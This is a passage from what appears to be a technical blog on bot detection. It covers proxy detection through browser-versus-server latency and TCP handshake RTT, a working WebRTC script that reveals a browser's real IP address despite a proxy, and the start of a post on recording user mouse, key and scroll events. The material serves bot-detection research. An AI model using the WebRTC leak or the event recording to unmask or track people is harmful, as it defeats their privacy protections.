<span class="kd">var</span> <span class="nx">milliseconds</span> <span class="o">=</span> <span class="nx">ended</span> <span class="o">-</span> <span class="nx">started</span><span class="p">;</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s2">"Took ms: "</span><span class="p">,</span> <span class="nx">milliseconds</span><span class="p">,</span> <span class="nx">ended2</span> <span class="o">-</span> <span class="nx">started2</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">};</span>
<span class="k">try</span> <span class="p">{</span>
<span class="nx">http</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="kc">null</span><span class="p">);</span>
<span class="p">}</span> <span class="k">catch</span><span class="p">(</span><span class="nx">exception</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// this is expected</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="nx">ping</span><span class="p">(</span><span class="s2">"https://incolumitas.com"</span><span class="p">)</span>
</code></pre></div>
<p>It's slightly pedantic to also use <code>performance.now()</code> to measure the RTT, but I want to be extra sure in case <code>new Date()</code> is not accurate enough. For our use case, the Same Origin Policy does not prevent us from measuring the latency from browser -> server, because we want to measure the latency to our own origin (our own server).</p>
<p>The lines</p>
<div class="highlight"><pre><span></span><code><span class="kd">var</span> <span class="nx">cacheBuster</span> <span class="o">=</span> <span class="s1">'?bust='</span> <span class="o">+</span> <span class="p">(</span><span class="ow">new</span> <span class="nb">Date</span><span class="p">()).</span><span class="nx">getTime</span><span class="p">()</span>
<span class="nx">url</span> <span class="o">+=</span> <span class="nx">cacheBuster</span><span class="p">;</span>
</code></pre></div>
<p>prevent the browser from caching the response and thus giving false results for latency measurements.</p>
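<p>The same idea can be written with <code>fetch</code> and a Promise, which makes the measured value easier to reuse. This is only a minimal sketch: the function name <code>measureRtt</code> and the injectable <code>fetchImpl</code> and <code>now</code> parameters are assumptions made for illustration, they are not part of the demo page.</p>

```javascript
// Sketch: time a cache-busted request with a monotonic clock.
// fetchImpl and now are injectable so the function can also be
// exercised outside of a browser (both names are hypothetical).
function measureRtt(url, fetchImpl = fetch, now = () => performance.now()) {
  // Append a unique query parameter so that no cached response is served.
  const separator = url.includes('?') ? '&' : '?';
  const bustedUrl = url + separator + 'bust=' + Date.now();
  const started = now();
  // Resolves with the elapsed milliseconds once the response headers arrive.
  return fetchImpl(bustedUrl, { cache: 'no-store' })
    .then(() => now() - started);
}
```

<p>In a browser, <code>measureRtt("https://incolumitas.com").then(console.log)</code> would log the elapsed time in milliseconds. A failed request rejects the Promise instead of reporting a time.</p>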
<h3>Live Example and Explanation of Results</h3>
<p>You can also visit the example page here: <a href="https://bot.incolumitas.com/crossping.html">https://bot.incolumitas.com/crossping.html</a></p>
<p>Keep in mind though: When you visit the <a href="https://bot.incolumitas.com/crossping.html">example page</a> with your normal browser that is not behind a proxy, your result will look something like this:</p>
<figure>
<img src="https://incolumitas.com/images/crossping1.png" alt="Crossping with normal browser without being behind a proxy" />
<figcaption>Crossping with normal browser without hiding behind a proxy. Note: I cannot ping a normal computer's public IP address from my server, because usually a NAT drops all incoming ICMP packets. That's the reason why the ping fails.<span style="font-size: 60%"></span></figcaption>
</figure>
<p>On the other hand, when a browser hides behind a proxy server, you will obtain a result as below. As an example, I used a well known scraping service and tested their JavaScript capable bot with the <a href="https://bot.incolumitas.com/crossping.html">live testing site</a>.</p>
<figure>
<img src="https://incolumitas.com/images/crossping2.png" alt="Crossping with a scraping service's bot behind a proxy" />
<figcaption>Those latencies are clearly different! The route browser -> server takes much longer compared to server -> external IP address!<span style="font-size: 60%"></span></figcaption>
</figure>
<p>And another example for a scraping service's bot that hides behind a proxy:</p>
<figure>
<img src="https://incolumitas.com/images/crossping3.png" alt="Crossping with another scraping service's bot behind a proxy" />
<figcaption>Even higher latencies...<span style="font-size: 60%"></span></figcaption>
</figure>
<p>We can make two key observations:</p>
<ol>
<li>Normal users have <code>browser -> server</code> JavaScript ping latencies in the range of roughly 100ms to 500ms. But when you hide behind a proxy, this number grows significantly to the range 1500ms - 6000ms.</li>
<li>The ping latency from <code>server -> external IP address</code> either cannot be obtained at all (because normal computers behind a NAT/CGNAT are not pingable), or, in the case of proxy servers, it is relatively low, in the range of 20ms - 200ms.</li>
</ol>
<p>It follows that we need to estimate which latencies are considered <em>normal</em> and which latencies are high enough to indicate an intermediate proxy server.</p>
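<p>A first, very rough way to turn the two observations into a decision is a pair of thresholds. The following sketch assumes hypothetical cut-off values taken directly from the ranges seen in the screenshots above. They are not calibrated and would need to be tuned with real traffic.</p>

```javascript
// Hypothetical thresholds derived from the ranges observed above.
const NORMAL_BROWSER_RTT_MAX_MS = 500;  // upper end seen for normal users
const PROXY_BROWSER_RTT_MIN_MS = 1500;  // lower end seen for proxied bots
const PROXY_PING_MAX_MS = 200;          // upper end of server -> proxy ping

// browserRttMs: JavaScript ping latency browser -> server.
// serverPingMs: ping latency server -> external IP, or null if not pingable.
function classifyLatency(browserRttMs, serverPingMs) {
  if (browserRttMs <= NORMAL_BROWSER_RTT_MAX_MS) {
    return 'normal';
  }
  if (browserRttMs >= PROXY_BROWSER_RTT_MIN_MS) {
    // A slow browser path combined with a fast, pingable external IP
    // matches the pattern observed for proxy servers.
    const pingable = serverPingMs !== null;
    return pingable && serverPingMs <= PROXY_PING_MAX_MS ? 'proxy-likely' : 'suspicious';
  }
  // Values between the two thresholds cannot be decided by this rule.
  return 'inconclusive';
}
```

<p>For example, <code>classifyLatency(3000, 40)</code> falls into the proxy pattern, while <code>classifyLatency(250, null)</code> looks like a normal visitor behind a NAT.</p>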
<h3>Improving RTT measurement server -> external IP</h3>
<p>Instead of measuring the latency with <code>ping</code> from server -> external IP address, it is probably a better idea to take the RTT measurements from the initial <a href="https://blog.packet-foo.com/2014/07/determining-tcp-initial-round-trip-time/">TCP handshake</a> of the incoming connection. There we can at least take an accurate measurement on the server. </p>
<p>Another advantage is that we no longer have the problem of hosts that cannot be pinged. Also: The handshake RTT is much easier to compare to the above JavaScript measurement than the ICMP-based <code>ping</code> result, since both are measured on a TCP connection that the browser itself opens.</p>
<figure>
<img src="https://incolumitas.com/images/InitialRTTServer.png" alt="Initial RTT measured on the server during the TCP handshake" />
<figcaption>Measuring the RTT on the server as the time between sending SYN/ACK and receiving the ACK<span style="font-size: 60%">Source: https://blog.packet-foo.com/2014/07/determining-tcp-initial-round-trip-time/</span> </figcaption>
</figure>
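<p>The calculation shown in the figure can be sketched in a few lines. The packet objects used here (<code>direction</code>, <code>flags</code>, <code>timestampMs</code>) are a hypothetical format that a packet capture would first have to be converted into. How the packets are captured on the server is left open.</p>

```javascript
// Sketch: initial RTT of one TCP connection, measured on the server as the
// time between sending the SYN/ACK and receiving the client's ACK.
// packets: array of { direction: 'in' | 'out', flags: string, timestampMs: number }
// in capture order (hypothetical format, see lead-in).
function initialRttMs(packets) {
  const synAck = packets.find(
    (p) => p.direction === 'out' && p.flags === 'SYN,ACK'
  );
  if (!synAck) return null;
  // The first incoming pure ACK at or after the SYN/ACK completes the handshake.
  const ack = packets.find(
    (p) => p.direction === 'in' && p.flags === 'ACK' &&
      p.timestampMs >= synAck.timestampMs
  );
  return ack ? ack.timestampMs - synAck.timestampMs : null;
}
```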
<h2>Second Idea: WebRTC Leaks the true IP Address</h2>
<p>This is an older technique, but still very relevant.</p>
<p><a href="https://en.wikipedia.org/wiki/WebRTC">WebRTC</a> (Web Real-Time Communication) is a technique that allows direct peer-to-peer communication in browsers. It is intended to make direct audio and video communication between peers possible.</p>
<p>Because direct peer-to-peer communication is possible, there must be a way to detect the public and internal IP addresses of the peers. This is made possible by the so-called <a href="https://developer.mozilla.org/en-US/docs/Web/API/WebRTC_API/Protocols">STUN protocol</a>.</p>
<blockquote>
<p>Session Traversal Utilities for NAT (STUN) (acronym within an acronym) is a protocol to discover your public address and determine any restrictions in your router that would prevent a direct connection with a peer. The client will send a request to a STUN server on the Internet who will reply with the client’s public address and whether or not the client is accessible behind the router’s NAT. (<a href="https://developer.mozilla.org/en-US/docs/Web/API/WebRTC_API/Protocols">Source</a>)</p>
</blockquote>
<p>However, the WebRTC protocol is unaffected by the proxy settings. If a browser is configured to use a proxy server, WebRTC does not communicate through this proxy.</p>
<p>This allows us to detect the real IP address of a browser that otherwise uses a proxy.</p>
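<p>Once the browser has reported the addresses it discovered via WebRTC, they can be compared with the IP address of the HTTP connection. The following is a minimal sketch of that comparison for IPv4 only. The function names are made up for illustration, and how the addresses are sent to the server is not covered.</p>

```javascript
// Parses a dotted-quad IPv4 string into four numbers, or returns null.
function parseIPv4(ip) {
  if (!/^\d{1,3}(\.\d{1,3}){3}$/.test(ip)) return null;
  const parts = ip.split('.').map(Number);
  return parts.every((n) => n <= 255) ? parts : null;
}

// True for private (RFC 1918), loopback and link-local IPv4 addresses.
function isPrivateIPv4(parts) {
  const [a, b] = parts;
  return a === 10 || a === 127 ||
    (a === 172 && b >= 16 && b <= 31) ||
    (a === 192 && b === 168) ||
    (a === 169 && b === 254);
}

// Returns the public IPv4 addresses found via WebRTC that differ from the
// address seen on the HTTP connection. A non-empty result hints at a proxy.
function findLeakedIPs(httpIp, webrtcIps) {
  return webrtcIps.filter((ip) => {
    const parts = parseIPv4(ip);
    return parts !== null && !isPrivateIPv4(parts) && ip !== httpIp;
  });
}
```

<p>Internal addresses such as <code>192.168.x.x</code> are filtered out because they never match the external address and would otherwise produce false positives.</p>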
<h3>WebRTC JavaScript Detection Implementation</h3>
<p>Visit the <a href="https://bot.incolumitas.com/webRTCclean.html">demo site</a>.</p>
<p>The following HTML page with inline JavaScript demonstrates the technique:</p>
<div class="highlight"><pre><span></span><code><span class="cp"><!DOCTYPE html></span><span class="p"><</span><span class="nt">html</span><span class="p">></span>
<span class="p"><</span><span class="nt">head</span><span class="p">></span>
<span class="p"><</span><span class="nt">meta</span> <span class="na">charset</span><span class="o">=</span><span class="s">"utf-8"</span><span class="p">></span>
<span class="p"><</span><span class="nt">meta</span> <span class="na">name</span><span class="o">=</span><span class="s">"viewport"</span> <span class="na">content</span><span class="o">=</span><span class="s">"width=device-width, initial-scale=1"</span><span class="p">></span>
<span class="p"><</span><span class="nt">title</span><span class="p">></span>WebRTC leak<span class="p"></</span><span class="nt">title</span><span class="p">></span>
<span class="p"></</span><span class="nt">head</span><span class="p">></span>
<span class="p"><</span><span class="nt">body</span><span class="p">></span>
<span class="p"><</span><span class="nt">script</span><span class="p">></span>
<span class="kd">var</span> <span class="nx">ips</span> <span class="o">=</span> <span class="p">[];</span>
<span class="kd">function</span> <span class="nx">findIP</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">myPeerConnection</span> <span class="o">=</span> <span class="nb">window</span><span class="p">.</span><span class="nx">RTCPeerConnection</span> <span class="o">||</span> <span class="nb">window</span><span class="p">.</span><span class="nx">mozRTCPeerConnection</span> <span class="o">||</span> <span class="nb">window</span><span class="p">.</span><span class="nx">webkitRTCPeerConnection</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">pc</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">myPeerConnection</span><span class="p">({</span><span class="nx">iceServers</span><span class="o">:</span> <span class="p">[{</span><span class="nx">urls</span><span class="o">:</span> <span class="s2">"stun:stun.l.google.com:19302"</span><span class="p">}]}),</span>
<span class="nx">noop</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{},</span>
<span class="nx">localIPs</span> <span class="o">=</span> <span class="p">{},</span>
<span class="nx">ipRegex</span> <span class="o">=</span> <span class="sr">/([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/g</span><span class="p">,</span>
<span class="nx">key</span><span class="p">;</span>
<span class="kd">function</span> <span class="nx">ipIterate</span><span class="p">(</span><span class="nx">ip</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nx">localIPs</span><span class="p">[</span><span class="nx">ip</span><span class="p">])</span> <span class="p">{</span>
<span class="nx">ips</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="nx">ip</span><span class="p">);</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="s2">"webRTCResult"</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nb">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">(</span><span class="nx">ips</span><span class="p">,</span> <span class="kc">null</span><span class="p">,</span> <span class="mf">2</span><span class="p">);</span>
<span class="p">}</span>
<span class="nx">localIPs</span><span class="p">[</span><span class="nx">ip</span><span class="p">]</span> <span class="o">=</span> <span class="kc">true</span><span class="p">;</span>
<span class="p">}</span>
<span class="nx">pc</span><span class="p">.</span><span class="nx">createDataChannel</span><span class="p">(</span><span class="s2">""</span><span class="p">);</span>
<span class="nx">pc</span><span class="p">.</span><span class="nx">createOffer</span><span class="p">(</span><span class="kd">function</span><span class="p">(</span><span class="nx">sdp</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">sdp</span><span class="p">.</span><span class="nx">sdp</span><span class="p">.</span><span class="nx">split</span><span class="p">(</span><span class="s1">'\n'</span><span class="p">).</span><span class="nx">forEach</span><span class="p">(</span><span class="kd">function</span><span class="p">(</span><span class="nx">line</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">line</span><span class="p">.</span><span class="nx">indexOf</span><span class="p">(</span><span class="s1">'candidate'</span><span class="p">)</span> <span class="o"><</span> <span class="mf">0</span><span class="p">)</span> <span class="k">return</span><span class="p">;</span>
<span class="p">(</span><span class="nx">line</span><span class="p">.</span><span class="nx">match</span><span class="p">(</span><span class="nx">ipRegex</span><span class="p">)</span> <span class="o">||</span> <span class="p">[]).</span><span class="nx">forEach</span><span class="p">(</span><span class="nx">ipIterate</span><span class="p">);</span>
<span class="p">});</span>
<span class="nx">pc</span><span class="p">.</span><span class="nx">setLocalDescription</span><span class="p">(</span><span class="nx">sdp</span><span class="p">,</span> <span class="nx">noop</span><span class="p">,</span> <span class="nx">noop</span><span class="p">);</span>
<span class="p">},</span> <span class="nx">noop</span><span class="p">);</span>
<span class="nx">pc</span><span class="p">.</span><span class="nx">onicecandidate</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">ice</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nx">ice</span> <span class="o">||</span> <span class="o">!</span><span class="nx">ice</span><span class="p">.</span><span class="nx">candidate</span> <span class="o">||</span> <span class="o">!</span><span class="nx">ice</span><span class="p">.</span><span class="nx">candidate</span><span class="p">.</span><span class="nx">candidate</span> <span class="o">||</span> <span class="o">!</span><span class="nx">ice</span><span class="p">.</span><span class="nx">candidate</span><span class="p">.</span><span class="nx">candidate</span><span class="p">.</span><span class="nx">match</span><span class="p">(</span><span class="nx">ipRegex</span><span class="p">))</span> <span class="k">return</span><span class="p">;</span>
<span class="nx">ice</span><span class="p">.</span><span class="nx">candidate</span><span class="p">.</span><span class="nx">candidate</span><span class="p">.</span><span class="nx">match</span><span class="p">(</span><span class="nx">ipRegex</span><span class="p">).</span><span class="nx">forEach</span><span class="p">(</span><span class="nx">ipIterate</span><span class="p">);</span>
<span class="p">};</span>
<span class="p">}</span>
<span class="k">try</span> <span class="p">{</span>
<span class="nx">findIP</span><span class="p">();</span>
<span class="p">}</span> <span class="k">catch</span><span class="p">(</span><span class="nx">err</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">ips</span> <span class="o">=</span> <span class="s1">'WebRTC failed: '</span> <span class="o">+</span> <span class="nx">err</span><span class="p">.</span><span class="nx">toString</span><span class="p">();</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="s2">"webRTCResult"</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nb">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">(</span><span class="nx">ips</span><span class="p">,</span> <span class="kc">null</span><span class="p">,</span> <span class="mf">2</span><span class="p">);</span>
<span class="p">}</span>
<span class="p"></</span><span class="nt">script</span><span class="p">></span>
<span class="p"><</span><span class="nt">h4</span><span class="p">></span>WebRTC Detected IPs<span class="p"></</span><span class="nt">h4</span><span class="p">></span>
<span class="p"><</span><span class="nt">pre</span> <span class="na">id</span><span class="o">=</span><span class="s">"webRTCResult"</span><span class="p">></</span><span class="nt">pre</span><span class="p">></span>
<span class="p"></</span><span class="nt">body</span><span class="p">></span>
<span class="p"></</span><span class="nt">html</span><span class="p">></span>
</code></pre></div>Behavioral Analysis for Bot Detection2021-04-11T22:07:00+02:002021-04-11T22:07:00+02:00Nikolai Tschachertag:incolumitas.com,2021-04-11:/2021/04/11/bot-detection-with-behavioral-analysis/<p>Behavioral analysis is an interesting approach to detect bots. It surely is not the panacea for bot detection, but it certainly is a useful extension in your bot hunting tool belt.</p><h2>Introduction</h2>
<p>Bots are programs created by humans to automate repetitive tasks on the Internet. In the widest sense, the emergence of bots is a manifestation of the worldwide process of automation that we are currently experiencing.</p>
<p>Some Examples of Bots:</p>
<ol>
<li>Sometimes bots only scrape Google or Amazon search engine results pages</li>
<li>Some bots <a href="https://antoinevastel.com/javascript/2019/08/31/sneakers-supreme-bots.html">buy highly sought after Nike sneakers</a> immediately after release</li>
<li>Other bots purchase PlayStation 5 consoles from official vendor stores as soon as they are restocked. This happens before legitimate users have a chance to buy a PS5 console (Scalping).</li>
<li>Other bots automate banking transactions in order to disintermediate online banks</li>
</ol>
<p>My conjecture is: Automated programs do not behave the same way as real human beings.</p>
<p>What do I mean by that from a technical perspective?</p>
<p>Before we can classify behavioral data as either bot-like or human, we have to record and collect it.</p>
<p>The idea is to record the following JavaScript events from every website user:</p>
<ul>
<li>Events indicating page load - <a href="https://developer.mozilla.org/en-US/docs/Web/API/Window/load_event">load</a> / <a href="https://developer.mozilla.org/en-US/docs/Web/API/Window/DOMContentLoaded_event">DOMContentLoaded</a></li>
<li>User switches the tab - <a href="https://developer.mozilla.org/en-US/docs/Web/API/Document/visibilitychange_event">visibilitychange</a></li>
<li>Mouse events - <a href="https://developer.mozilla.org/en-US/docs/Web/API/Element/mousedown_event">mousedown / mouseup</a> and <a href="https://developer.mozilla.org/en-US/docs/Web/API/Element/mousemove_event">mousemove</a></li>
<li>Scroll events - <a href="https://developer.mozilla.org/en-US/docs/Web/API/Element/scroll">scroll</a></li>
<li>Mobile Touch Events - <a href="https://developer.mozilla.org/en-US/docs/Web/API/Touch_events">touchstart / touchend</a> and <a href="https://developer.mozilla.org/en-US/docs/Web/API/Document/touchmove_event">touchmove</a></li>
<li>Keyboard events - <a href="https://developer.mozilla.org/en-US/docs/Web/API/Document/keydown_event">keydown / keyup</a></li>
<li>Events indicating the unloading of the page - <a href="https://developer.mozilla.org/en-US/docs/Web/API/Window/pagehide_event">pagehide</a> / <a href="https://developer.mozilla.org/en-US/docs/Web/API/Window/unload_event">unload</a> / <a href="https://developer.mozilla.org/en-US/docs/Web/API/Window/beforeunload_event">beforeunload</a></li>
</ul>
<p>Each of the above events is assigned a timestamp obtained with <code>performance.now()</code>.</p>
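<p>How such a recorder could look is sketched below for a subset of the events. The short type codes, the recorded fields and the function name <code>createRecorder</code> are assumptions made for illustration. They are not the exact format used by the recording script of this blog.</p>

```javascript
// Sketch: record a subset of the events listed above as compact arrays of
// the form [type, ...fields, timestamp]. All codes and fields are hypothetical.
function createRecorder(target, now) {
  const recorded = [];
  const extractors = {
    mousemove: (e) => ['m', e.clientX, e.clientY],
    mousedown: (e) => ['md', e.clientX, e.clientY],
    mouseup: (e) => ['mu', e.clientX, e.clientY],
    // The pressed key is deliberately not stored, only the fact and the time.
    keydown: () => ['kd'],
    keyup: () => ['ku'],
  };
  Object.keys(extractors).forEach((type) => {
    target.addEventListener(type, (e) => {
      // Append the timestamp as the last element of each record.
      recorded.push(extractors[type](e).concat(now()));
    });
  });
  return recorded;
}
```

<p>In a browser this would be started with <code>createRecorder(document, () => performance.now())</code>. The returned array then fills up while the user interacts with the page.</p>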
<p>The above process yields a time series of behavioral interaction data such as the following:</p>
<div class="highlight"><pre><span></span><code><span class="p">[</span>
<span class="p">[</span><span class="s2">"dcl"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">665.72</span><span class="p">],[</span><span class="s2">"s"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="mf">3265</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">730.785</span><span class="p">],[</span><span class="s2">"s"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="mf">3265</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">897.025</span><span class="p">],[</span><span class="s2">"s"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="mf">3286</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">984</span><span class="p">],[</span><span class="s2">"lo"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1039.395</span><span class="p">],[</span><span class="s2">"s"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="mf">3540</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1040.78</span><span class="p">],[</span><span class="s2">"s"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="mf">3561</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1051.26</span><span class="p">],[</span><span class="s2">"s"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="mf">3561</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1062.775</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">1053</span><span class="p">,</span><span 
class="mf">199</span><span class="p">,</span><span class="mf">2973</span><span class="p">,</span><span class="mf">300</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1488.325</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">1050</span><span class="p">,</span><span class="mf">201</span><span class="p">,</span><span class="mf">2970</span><span class="p">,</span><span class="mf">302</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1496.05</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">1019</span><span class="p">,</span><span class="mf">214</span><span class="p">,</span><span class="mf">2939</span><span class="p">,</span><span class="mf">315</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1512.66</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">951</span><span class="p">,</span><span class="mf">243</span><span class="p">,</span><span class="mf">2871</span><span class="p">,</span><span class="mf">344</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1529.29</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">845</span><span class="p">,</span><span class="mf">277</span><span class="p">,</span><span class="mf">2765</span><span class="p">,</span><span class="mf">378</span><span 
class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1546.015</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">717</span><span class="p">,</span><span class="mf">313</span><span class="p">,</span><span class="mf">2637</span><span class="p">,</span><span class="mf">414</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1562.555</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">585</span><span class="p">,</span><span class="mf">337</span><span class="p">,</span><span class="mf">2505</span><span class="p">,</span><span class="mf">438</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1578.15</span><span class="p">],</span>
<span class="p">[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">463</span><span class="p">,</span><span class="mf">357</span><span class="p">,</span><span class="mf">2383</span><span class="p">,</span><span class="mf">458</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1595.69</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">361</span><span class="p">,</span><span class="mf">373</span><span class="p">,</span><span class="mf">2281</span><span class="p">,</span><span class="mf">474</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1611.97</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">291</span><span class="p">,</span><span class="mf">375</span><span class="p">,</span><span class="mf">2211</span><span class="p">,</span><span class="mf">476</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1628.015</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">247</span><span class="p">,</span><span class="mf">369</span><span class="p">,</span><span class="mf">2167</span><span class="p">,</span><span class="mf">470</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1645.06</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">241</span><span class="p">,</span><span 
class="mf">363</span><span class="p">,</span><span class="mf">2161</span><span class="p">,</span><span class="mf">464</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1662.015</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">241</span><span class="p">,</span><span class="mf">350</span><span class="p">,</span><span class="mf">2161</span><span class="p">,</span><span class="mf">451</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1679.215</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">257</span><span class="p">,</span><span class="mf">323</span><span class="p">,</span><span class="mf">2177</span><span class="p">,</span><span class="mf">424</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1695.82</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">295</span><span class="p">,</span><span class="mf">287</span><span class="p">,</span><span class="mf">2215</span><span class="p">,</span><span class="mf">388</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1712.785</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">355</span><span class="p">,</span><span class="mf">263</span><span class="p">,</span><span class="mf">2275</span><span class="p">,</span><span class="mf">364</span><span 
class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1729.085</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">445</span><span class="p">,</span><span class="mf">247</span><span class="p">,</span><span class="mf">2365</span><span class="p">,</span><span class="mf">348</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1746.455</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">561</span><span class="p">,</span><span class="mf">247</span><span class="p">,</span><span class="mf">2481</span><span class="p">,</span><span class="mf">348</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1762.92</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">697</span><span class="p">,</span><span class="mf">253</span><span class="p">,</span><span class="mf">2617</span><span class="p">,</span><span class="mf">354</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1778.59</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">817</span><span class="p">,</span><span class="mf">269</span><span class="p">,</span><span class="mf">2737</span><span class="p">,</span><span class="mf">370</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span 
class="mf">1</span><span class="p">,</span><span class="mf">1795.34</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">915</span><span class="p">,</span><span class="mf">283</span><span class="p">,</span><span class="mf">2835</span><span class="p">,</span><span class="mf">384</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1812.275</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">983</span><span class="p">,</span><span class="mf">293</span><span class="p">,</span><span class="mf">2903</span><span class="p">,</span><span class="mf">394</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1829.455</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">1025</span><span class="p">,</span><span class="mf">305</span><span class="p">,</span><span class="mf">2945</span><span 